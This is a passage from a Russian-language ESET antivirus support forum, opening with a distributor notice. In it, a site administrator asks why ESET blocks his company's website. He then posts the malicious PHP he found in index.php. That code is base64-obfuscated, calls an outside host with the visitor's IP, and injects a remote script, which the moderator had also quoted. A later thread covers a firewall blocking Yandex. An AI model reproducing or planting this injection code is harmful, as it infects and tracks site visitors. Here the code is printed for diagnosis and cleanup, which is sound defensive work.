Вход
Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Форум технической поддержки Обращение в техническую поддержку

[ Закрыто ] Антивирус блокирует , главная

1 2 3 4 5 ... 12 След.
RSS
 
Roman Ermilov
Roman Ermilov
Пользователь
Сообщений: 2
Баллов: 1
Регистрация: 31.03.2014
Размещено 31.03.2014 15:34:09
Доброго времени суток.
С недавнего времени начал админить одну фирму, и один из их сайтов блокируется нодом.
http://www.elk-spb.ru
Слил через ftp сайт, проверил НОДом, в двух файлах были сомнительные ссылки в ява-скрипте. Вычистил.
Проверил ещё раз, сканируя на локальном диске у себя - нормально, не ругается. Залил обратно.
Результат: сайт чист, но НОД ругается на сайт, а остальные антивирусы - нет. Вирустотал говорит "сайт из клин"

https://www.virustotal.com/ru/url/e36684d3fb17e0219b3d5c2b23c6b8d86ab31d3dfb51381cd­d7282b1aad19263/analysis/1396260082/

Самое обидное, что непонятно, что ему не нравится. В логах "архив". Что это значит?
Вот пример записи из лога:
"31.03.2014 15:12:34 Фильтр HTTP архив http://www.elk-spb.ru HTML/ScrInject.B.Gen вирус соединение прервано - изолирован ERROM-WORK\user Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files (x86)\Mozilla Firefox\firefox.exe."

В свойствах записи следующее:

"http://www.elk-spb.ru HTML/ScrInject.B.Gen вирус соединение прервано - изолирован Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files (x86)\Mozilla Firefox\firefox.exe.
http://www.elk-spb.ru = GZ = file.htm HTML/ScrInject.B.Gen вирус "

Подскажите, пожалуйста, куда копать.
 
zloyDi
zloyDi
Модератор
Сообщений: 12962
Баллов: 10371
Регистрация: 16.03.2010
Размещено 31.03.2014 17:35:35
Возможно это

Цитата
<script src="h_ttp://accountus.gets-it.net/googlestat.php"></script>
Изменено: zloyDi - 27.01.2018 08:45:22

 
Roman Ermilov
Roman Ermilov
Пользователь
Сообщений: 2
Баллов: 1
Регистрация: 31.03.2014
Размещено 01.04.2014 09:14:47
Да. Точно. Проблему вызывал вот этот кусок в index.php

Код
function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

      if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
      $ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
      $file = @fopen ($get, "r");
      $content = @fread($file, 1000);
      @setcookie("iJijkdaMnerys", $value, time()+3600*24);
      if (!$content)
         echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9hY2NvdW50dXMuZ2V0cy1pdC5uZXQvZ29vZ2xlc3RhdC5waHAiPjwvc2NyaXB0Pg==");
      else 
         echo $content;

      }
}
collectnewss ();



Поскольку я php знаю ровно настолько, чтоб отличить его от других языков, не сразу разобрался.

Спасибо за помощь.

Кстати, ещё раз хочется отметить то, что это детектит только НОД.
 
zloyDi
zloyDi
Модератор
Сообщений: 12962
Баллов: 10371
Регистрация: 16.03.2010
Размещено 01.04.2014 10:46:15
Ну вот и ладненько. Тему закрываю.
 
Николай Николай
Николай Николай
Пользователь
Сообщений: 3
Баллов: 1
Регистрация: 27.05.2014
Размещено 27.05.2014 20:30:57
Доброго времени суток всем участникам форума.
Буквально месяц назад появилась следующая проблемка.
В качестве браузера по умолчанию стоит Mozilla Firefox, месяц назад браузер перестал открывать страницу Яндекс. Путем отключения модулей защиты в ESET 7 определил, что после отключения "персонального файервола" браузер загружает страницу яедкс-а без проблем. После данной процедуры с отключением и включением файервола страница яндекса открывается до перезагрузки ПК, после перезагрузки проблема проявляется снова.
То же самое и с браузером IE.
Прошу подсказать в чем проблема если кто-то с этим уже сталкивался.
 
zloyDi
zloyDi
Модератор
Сообщений: 12962
Баллов: 10371
Регистрация: 16.03.2010
Размещено 27.05.2014 23:04:58
В каком режиме стоит файервол? Проблема во всех браузерах? Включена ли проверка HTTPS?
 
Николай Николай
Николай Николай
Пользователь
Сообщений: 3
Баллов: 1
Регистрация: 27.05.2014
Размещено 28.05.2014 08:44:00
Файервол стоит в интерактивном режиме. Проблема проверена на двух браузерах Mozilla Firefox и IE.
По проверки HTTPS, если не сложно подскажи где в настройках можно посмотреть, видимо где-то пропускаю.
 
Валентин
Валентин
Администратор
Сообщений: 5198
Баллов: 4168
Регистрация: 12.05.2010
Размещено 28.05.2014 10:21:18
Николай, зайдите в дополнительные настройки (F5) - Сеть - Персональный файервол - в разделе  "Дополнительные настройки и IDS" -> "Решение проблем" выставить галочку "Регистрировать все заблокированные соединения", перезагрузите ПК, попробуйте зайти на сайт , в основном окне выберите Служебные программы -> Файлы журнала -> Персональный файервол -> В контекстном меню выберите"Экспорт", выберите файл для сохранения журнала и пришлите его нам.

По HTTPS - раздел Интернет и электронная почта - Защита доступа в Интернет - HTTP, HTTPS.
ESET Technical Support
 
Николай Николай
Николай Николай
Пользователь
Сообщений: 3
Баллов: 1
Регистрация: 27.05.2014
Размещено 28.05.2014 21:44:57
Куда оправить журнал событий?
Изменено: Николай Николай - 27.01.2018 08:34:49
 
Валентин
Валентин
Администратор
Сообщений: 5198
Баллов: 4168
Регистрация: 12.05.2010
Размещено 30.05.2014 11:30:25
Николай, прикрепите его здесь, на форуме.
ESET Technical Support
 
1 2 3 4 5 ... 12 След.
Читают тему